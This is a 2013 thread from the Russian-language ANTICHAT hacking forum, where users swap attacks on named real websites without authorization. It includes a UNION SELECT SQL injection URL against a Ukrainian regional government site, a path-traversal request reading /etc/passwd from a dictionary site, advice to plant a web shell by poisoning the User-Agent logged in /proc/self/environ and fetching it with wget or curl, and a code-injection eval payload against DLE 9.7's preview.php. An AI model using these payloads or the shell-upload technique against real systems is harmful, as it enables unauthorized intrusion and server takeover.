HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22051  
Старый 31.01.2013, 01:44
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от LelouchMe  
LelouchMe said:
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
 
Ответить с цитированием

  #22052  
Старый 01.02.2013, 20:43
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
 
Ответить с цитированием

  #22053  
Старый 01.02.2013, 21:55
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Del msg
 
Ответить с цитированием

  #22054  
Старый 01.02.2013, 21:57
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Цитата:
Сообщение от Vip77  
Vip77 said:
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
 
Ответить с цитированием

  #22055  
Старый 01.02.2013, 23:19
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
А что делать, если /proc/self/environ выглядит так:

NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL

Т.е., прочитать я его могу, но, кажется, что-то с ним не так
 
Ответить с цитированием

  #22056  
Старый 02.02.2013, 03:32
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Цитата:
Сообщение от Zed0x  
Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
там пхп не установлен походу
 
Ответить с цитированием

  #22057  
Старый 02.02.2013, 19:54
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

http://www.exploit-db.com/exploits/24444/

Смысл в том, что он под метасплоит.

Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR] 
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.

Подскажите, что делаю не так

UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть
 
Ответить с цитированием

  #22058  
Старый 03.02.2013, 00:26
panfilov1991
Guest
Сообщений: n/a
Провел на форуме:
6020

Репутация: 0
По умолчанию

Код:
Code:
http://www.golowar.ru/news.php?id=67&page='
пишет:

Цитата:
Сообщение от None  
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
Проверил сайт, можно ли считать это уязвимостью?

Как дальше её раскрутить чтоб исправить!
 
Ответить с цитированием

  #22059  
Старый 03.02.2013, 13:15
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
Zed0x said:
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR] 
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть
Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
 
Ответить с цитированием

  #22060  
Старый 03.02.2013, 15:05
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

del msg
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ